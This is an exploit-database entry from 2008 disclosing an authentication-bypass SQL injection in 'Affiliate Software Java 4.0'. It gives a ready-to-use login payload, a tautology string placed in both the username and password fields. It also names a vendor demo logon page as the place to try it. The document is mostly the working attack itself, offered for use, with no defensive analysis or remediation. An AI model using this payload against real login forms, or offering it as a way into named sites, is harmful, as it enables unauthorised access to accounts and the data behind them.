Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability

2008-12-11T00:00:00
ID 1337DAY-ID-4418
Type zdt
Reporter R3d-D3v!L
Modified 2008-12-11T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================================
Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability
=====================================================================


[~] Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
   
 [~] Vendor: www.adserversolutions.com
   
 [?] Software: Affiliate Software Java 4.0
   
 [?] Date: 12.12.2008
   
 [?] contact: N/A
   
 [?] Exploit:
   
 ? username: r0' or ' 1=1--
 ? password: r0' or ' 1=1--
   
   
 [?]login 4 d3m0:
   
  http://www.adserversolutions.com/affiliate_java/logon.jsp
 
 [~]--------------------------------------------------------------------------------



#  0day.today [2018-01-10]  #